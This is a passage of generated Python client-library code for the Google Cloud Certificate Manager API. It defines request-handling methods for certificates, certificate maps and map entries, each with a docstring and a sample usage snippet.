metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def create_certificate(
self,
request: Union[certificate_manager.CreateCertificateRequest, dict] = None,
*,
parent: str = None,
certificate: certificate_manager.Certificate = None,
certificate_id: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation.Operation:
r"""Creates a new Certificate in a given project and
location.
.. code-block:: python
from google.cloud import certificate_manager_v1
def sample_create_certificate():
# Create a client
client = certificate_manager_v1.CertificateManagerClient()
# Initialize request argument(s)
request = certificate_manager_v1.CreateCertificateRequest(
parent="parent_value",
certificate_id="certificate_id_value",
)
# Make the request
operation = client.create_certificate(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
Args:
request (Union[google.cloud.certificate_manager_v1.types.CreateCertificateRequest, dict]):
The request object. Request for the `CreateCertificate`
method.
parent (str):
Required. The parent resource of the certificate. Must
be in the format ``projects/*/locations/*``.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
certificate (google.cloud.certificate_manager_v1.types.Certificate):
Required. A definition of the
certificate to create.
This corresponds to the ``certificate`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
certificate_id (str):
Required. A user-provided name of the
certificate.
This corresponds to the ``certificate_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be
:class:`google.cloud.certificate_manager_v1.types.Certificate`
Defines TLS certificate.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent, certificate, certificate_id])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a certificate_manager.CreateCertificateRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, certificate_manager.CreateCertificateRequest):
request = certificate_manager.CreateCertificateRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if certificate is not None:
request.certificate = certificate
if certificate_id is not None:
request.certificate_id = certificate_id
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.create_certificate]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = operation.from_gapic(
response,
self._transport.operations_client,
certificate_manager.Certificate,
metadata_type=certificate_manager.OperationMetadata,
)
# Done; return the response.
return response
def update_certificate(
self,
request: Union[certificate_manager.UpdateCertificateRequest, dict] = None,
*,
certificate: certificate_manager.Certificate = None,
update_mask: field_mask_pb2.FieldMask = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation.Operation:
r"""Updates a Certificate.
.. code-block:: python
from google.cloud import certificate_manager_v1
def sample_update_certificate():
# Create a client
client = certificate_manager_v1.CertificateManagerClient()
# Initialize request argument(s)
request = certificate_manager_v1.UpdateCertificateRequest(
)
# Make the request
operation = client.update_certificate(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
Args:
request (Union[google.cloud.certificate_manager_v1.types.UpdateCertificateRequest, dict]):
The request object. Request for the `UpdateCertificate`
method.
certificate (google.cloud.certificate_manager_v1.types.Certificate):
Required. A definition of the
certificate to update.
This corresponds to the ``certificate`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
update_mask (google.protobuf.field_mask_pb2.FieldMask):
Required. The update mask applies to the resource. For
the ``FieldMask`` definition, see
https://developers.google.com/protocol-buffers/docs/reference/google.protobuf#fieldmask.
This corresponds to the ``update_mask`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be
:class:`google.cloud.certificate_manager_v1.types.Certificate`
Defines TLS certificate.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([certificate, update_mask])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a certificate_manager.UpdateCertificateRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, certificate_manager.UpdateCertificateRequest):
request = certificate_manager.UpdateCertificateRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if certificate is not None:
request.certificate = certificate
if update_mask is not None:
request.update_mask = update_mask
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.update_certificate]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("certificate.name", request.certificate.name),)
),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = operation.from_gapic(
response,
self._transport.operations_client,
certificate_manager.Certificate,
metadata_type=certificate_manager.OperationMetadata,
)
# Done; return the response.
return response
def delete_certificate(
self,
request: Union[certificate_manager.DeleteCertificateRequest, dict] = None,
*,
name: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation.Operation:
r"""Deletes a single Certificate.
.. code-block:: python
from google.cloud import certificate_manager_v1
def sample_delete_certificate():
# Create a client
client = certificate_manager_v1.CertificateManagerClient()
# Initialize request argument(s)
request = certificate_manager_v1.DeleteCertificateRequest(
name="name_value",
)
# Make the request
operation = client.delete_certificate(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
Args:
request (Union[google.cloud.certificate_manager_v1.types.DeleteCertificateRequest, dict]):
The request object. Request for the `DeleteCertificate`
method.
name (str):
Required. A name of the certificate to delete. Must be
in the format ``projects/*/locations/*/certificates/*``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.protobuf.empty_pb2.Empty` A generic empty message that you can re-use to avoid defining duplicated
empty messages in your APIs. A typical example is to
use it as the request or the response type of an API
method. For instance:
service Foo {
rpc Bar(google.protobuf.Empty) returns
(google.protobuf.Empty);
}
The JSON representation for Empty is empty JSON
object {}.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a certificate_manager.DeleteCertificateRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, certificate_manager.DeleteCertificateRequest):
request = certificate_manager.DeleteCertificateRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.delete_certificate]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = operation.from_gapic(
response,
self._transport.operations_client,
empty_pb2.Empty,
metadata_type=certificate_manager.OperationMetadata,
)
# Done; return the response.
return response
def list_certificate_maps(
self,
request: Union[certificate_manager.ListCertificateMapsRequest, dict] = None,
*,
parent: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListCertificateMapsPager:
r"""Lists CertificateMaps in a given project and
location.
.. code-block:: python
from google.cloud import certificate_manager_v1
def sample_list_certificate_maps():
# Create a client
client = certificate_manager_v1.CertificateManagerClient()
# Initialize request argument(s)
request = certificate_manager_v1.ListCertificateMapsRequest(
parent="parent_value",
)
# Make the request
page_result = client.list_certificate_maps(request=request)
# Handle the response
for response in page_result:
print(response)
Args:
request (Union[google.cloud.certificate_manager_v1.types.ListCertificateMapsRequest, dict]):
The request object. Request for the
`ListCertificateMaps` method.
parent (str):
Required. The project and location from which the
certificate maps should be listed, specified in the
format ``projects/*/locations/*``.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.certificate_manager_v1.services.certificate_manager.pagers.ListCertificateMapsPager:
Response for the ListCertificateMaps method.
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a certificate_manager.ListCertificateMapsRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, certificate_manager.ListCertificateMapsRequest):
request = certificate_manager.ListCertificateMapsRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.list_certificate_maps]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# This method is paged; wrap the response in a pager, which provides
# an `__iter__` convenience method.
response = pagers.ListCertificateMapsPager(
method=rpc,
request=request,
response=response,
metadata=metadata,
)
# Done; return the response.
return response
def get_certificate_map(
self,
request: Union[certificate_manager.GetCertificateMapRequest, dict] = None,
*,
name: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> certificate_manager.CertificateMap:
r"""Gets details of a single CertificateMap.
.. code-block:: python
from google.cloud import certificate_manager_v1
def sample_get_certificate_map():
# Create a client
client = certificate_manager_v1.CertificateManagerClient()
# Initialize request argument(s)
request = certificate_manager_v1.GetCertificateMapRequest(
name="name_value",
)
# Make the request
response = client.get_certificate_map(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.certificate_manager_v1.types.GetCertificateMapRequest, dict]):
The request object. Request for the `GetCertificateMap`
method.
name (str):
Required. A name of the certificate map to describe.
Must be in the format
``projects/*/locations/*/certificateMaps/*``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.certificate_manager_v1.types.CertificateMap:
Defines a collection of certificate
configurations.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a certificate_manager.GetCertificateMapRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, certificate_manager.GetCertificateMapRequest):
request = certificate_manager.GetCertificateMapRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.get_certificate_map]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def create_certificate_map(
self,
request: Union[certificate_manager.CreateCertificateMapRequest, dict] = None,
*,
parent: str = None,
certificate_map: certificate_manager.CertificateMap = None,
certificate_map_id: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation.Operation:
r"""Creates a new CertificateMap in a given project and
location.
.. code-block:: python
from google.cloud import certificate_manager_v1
def sample_create_certificate_map():
# Create a client
client = certificate_manager_v1.CertificateManagerClient()
# Initialize request argument(s)
request = certificate_manager_v1.CreateCertificateMapRequest(
parent="parent_value",
certificate_map_id="certificate_map_id_value",
)
# Make the request
operation = client.create_certificate_map(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
Args:
request (Union[google.cloud.certificate_manager_v1.types.CreateCertificateMapRequest, dict]):
The request object. Request for the
`CreateCertificateMap` method.
parent (str):
Required. The parent resource of the certificate map.
Must be in the format ``projects/*/locations/*``.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
certificate_map (google.cloud.certificate_manager_v1.types.CertificateMap):
Required. A definition of the
certificate map to create.
This corresponds to the ``certificate_map`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
certificate_map_id (str):
Required. A user-provided name of the
certificate map.
This corresponds to the ``certificate_map_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be
:class:`google.cloud.certificate_manager_v1.types.CertificateMap`
Defines a collection of certificate configurations.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent, certificate_map, certificate_map_id])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a certificate_manager.CreateCertificateMapRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, certificate_manager.CreateCertificateMapRequest):
request = certificate_manager.CreateCertificateMapRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if certificate_map is not None:
request.certificate_map = certificate_map
if certificate_map_id is not None:
request.certificate_map_id = certificate_map_id
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.create_certificate_map]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = operation.from_gapic(
response,
self._transport.operations_client,
certificate_manager.CertificateMap,
metadata_type=certificate_manager.OperationMetadata,
)
# Done; return the response.
return response
def update_certificate_map(
self,
request: Union[certificate_manager.UpdateCertificateMapRequest, dict] = None,
*,
certificate_map: certificate_manager.CertificateMap = None,
update_mask: field_mask_pb2.FieldMask = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation.Operation:
r"""Updates a CertificateMap.
.. code-block:: python
from google.cloud import certificate_manager_v1
def sample_update_certificate_map():
# Create a client
client = certificate_manager_v1.CertificateManagerClient()
# Initialize request argument(s)
request = certificate_manager_v1.UpdateCertificateMapRequest(
)
# Make the request
operation = client.update_certificate_map(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
Args:
request (Union[google.cloud.certificate_manager_v1.types.UpdateCertificateMapRequest, dict]):
The request object. Request for the
`UpdateCertificateMap` method.
certificate_map (google.cloud.certificate_manager_v1.types.CertificateMap):
Required. A definition of the
certificate map to update.
This corresponds to the ``certificate_map`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
update_mask (google.protobuf.field_mask_pb2.FieldMask):
Required. The update mask applies to the resource. For
the ``FieldMask`` definition, see
https://developers.google.com/protocol-buffers/docs/reference/google.protobuf#fieldmask.
This corresponds to the ``update_mask`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be
:class:`google.cloud.certificate_manager_v1.types.CertificateMap`
Defines a collection of certificate configurations.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([certificate_map, update_mask])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a certificate_manager.UpdateCertificateMapRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, certificate_manager.UpdateCertificateMapRequest):
request = certificate_manager.UpdateCertificateMapRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if certificate_map is not None:
request.certificate_map = certificate_map
if update_mask is not None:
request.update_mask = update_mask
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.update_certificate_map]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("certificate_map.name", request.certificate_map.name),)
),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = operation.from_gapic(
response,
self._transport.operations_client,
certificate_manager.CertificateMap,
metadata_type=certificate_manager.OperationMetadata,
)
# Done; return the response.
return response
def delete_certificate_map(
self,
request: Union[certificate_manager.DeleteCertificateMapRequest, dict] = None,
*,
name: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation.Operation:
r"""Deletes a single CertificateMap. A Certificate Map
can't be deleted if it contains Certificate Map Entries.
Remove all the entries from the map before calling this
method.
.. code-block:: python
from google.cloud import certificate_manager_v1
def sample_delete_certificate_map():
# Create a client
client = certificate_manager_v1.CertificateManagerClient()
# Initialize request argument(s)
request = certificate_manager_v1.DeleteCertificateMapRequest(
name="name_value",
)
# Make the request
operation = client.delete_certificate_map(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
Args:
request (Union[google.cloud.certificate_manager_v1.types.DeleteCertificateMapRequest, dict]):
The request object. Request for the
`DeleteCertificateMap` method.
name (str):
Required. A name of the certificate map to delete. Must
be in the format
``projects/*/locations/*/certificateMaps/*``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.protobuf.empty_pb2.Empty` A generic empty message that you can re-use to avoid defining duplicated
empty messages in your APIs. A typical example is to
use it as the request or the response type of an API
method. For instance:
service Foo {
rpc Bar(google.protobuf.Empty) returns
(google.protobuf.Empty);
}
The JSON representation for Empty is empty JSON
object {}.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a certificate_manager.DeleteCertificateMapRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, certificate_manager.DeleteCertificateMapRequest):
request = certificate_manager.DeleteCertificateMapRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.delete_certificate_map]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = operation.from_gapic(
response,
self._transport.operations_client,
empty_pb2.Empty,
metadata_type=certificate_manager.OperationMetadata,
)
# Done; return the response.
return response
def list_certificate_map_entries(
self,
request: Union[
certificate_manager.ListCertificateMapEntriesRequest, dict
] = None,
*,
parent: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListCertificateMapEntriesPager:
r"""Lists CertificateMapEntries in a given project and
location.
.. code-block:: python
from google.cloud import certificate_manager_v1
def sample_list_certificate_map_entries():
# Create a client
client = certificate_manager_v1.CertificateManagerClient()
# Initialize request argument(s)
request = certificate_manager_v1.ListCertificateMapEntriesRequest(
parent="parent_value",
)
# Make the request
page_result = client.list_certificate_map_entries(request=request)
# Handle the response
for response in page_result:
print(response)
Args:
request (Union[google.cloud.certificate_manager_v1.types.ListCertificateMapEntriesRequest, dict]):
The request object. Request for the
`ListCertificateMapEntries` method.
parent (str):
Required. The project, location and certificate map from
which the certificate map entries should be listed,
specified in the format
``projects/*/locations/*/certificateMaps/*``.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.certificate_manager_v1.services.certificate_manager.pagers.ListCertificateMapEntriesPager:
Response for the ListCertificateMapEntries method.
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a certificate_manager.ListCertificateMapEntriesRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request, certificate_manager.ListCertificateMapEntriesRequest
):
request = certificate_manager.ListCertificateMapEntriesRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.list_certificate_map_entries
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# This method is paged; wrap the response in a pager, which provides
# an `__iter__` convenience method.
response = pagers.ListCertificateMapEntriesPager(
method=rpc,
request=request,
response=response,
metadata=metadata,
)
# Done; return the response.
return response
def get_certificate_map_entry(
self,
request: Union[certificate_manager.GetCertificateMapEntryRequest, dict] = None,
*,
name: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> certificate_manager.CertificateMapEntry:
r"""Gets details of a single CertificateMapEntry.
.. code-block:: python
from google.cloud import certificate_manager_v1
def sample_get_certificate_map_entry():
# Create a client
client = certificate_manager_v1.CertificateManagerClient()
# Initialize request argument(s)
request = certificate_manager_v1.GetCertificateMapEntryRequest(
name="name_value",
)
# Make the request
response = client.get_certificate_map_entry(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.certificate_manager_v1.types.GetCertificateMapEntryRequest, dict]):
The request object. Request for the
`GetCertificateMapEntry` method.
name (str):
Required. A name of the certificate map entry to
describe. Must be in the format
``projects/*/locations/*/certificateMaps/*/certificateMapEntries/*``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.certificate_manager_v1.types.CertificateMapEntry:
Defines a certificate map entry.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a certificate_manager.GetCertificateMapEntryRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, certificate_manager.GetCertificateMapEntryRequest):
request = certificate_manager.GetCertificateMapEntryRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.get_certificate_map_entry
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def create_certificate_map_entry(
self,
request: Union[
certificate_manager.CreateCertificateMapEntryRequest, dict
] = None,
*,
parent: str = None,
certificate_map_entry: certificate_manager.CertificateMapEntry = None,
certificate_map_entry_id: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation.Operation:
r"""Creates a new CertificateMapEntry in a given project
and location.
.. code-block:: python
from google.cloud import certificate_manager_v1
def sample_create_certificate_map_entry():
# Create a client
client = certificate_manager_v1.CertificateManagerClient()
# Initialize request argument(s)
certificate_map_entry = certificate_manager_v1.CertificateMapEntry()
certificate_map_entry.hostname = "hostname_value"
request = certificate_manager_v1.CreateCertificateMapEntryRequest(
parent="parent_value",
certificate_map_entry_id="certificate_map_entry_id_value",
certificate_map_entry=certificate_map_entry,
)
# Make the request
operation = client.create_certificate_map_entry(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
Args:
request (Union[google.cloud.certificate_manager_v1.types.CreateCertificateMapEntryRequest, dict]):
The request object. Request for the
`CreateCertificateMapEntry` method.
parent (str):
Required. The parent resource of the certificate map
entry. Must be in the format
``projects/*/locations/*/certificateMaps/*``.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
certificate_map_entry (google.cloud.certificate_manager_v1.types.CertificateMapEntry):
Required. A definition of the
certificate map entry to create.
This corresponds to the ``certificate_map_entry`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
certificate_map_entry_id (str):
Required. A user-provided name of the
certificate map entry.
This corresponds to the ``certificate_map_entry_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be
:class:`google.cloud.certificate_manager_v1.types.CertificateMapEntry`
Defines a certificate map entry.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any(
[parent, certificate_map_entry, certificate_map_entry_id]
)
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a certificate_manager.CreateCertificateMapEntryRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request, certificate_manager.CreateCertificateMapEntryRequest
):
request = certificate_manager.CreateCertificateMapEntryRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if certificate_map_entry is not None:
request.certificate_map_entry = certificate_map_entry
if certificate_map_entry_id is not None:
request.certificate_map_entry_id = certificate_map_entry_id
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.create_certificate_map_entry
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = operation.from_gapic(
response,
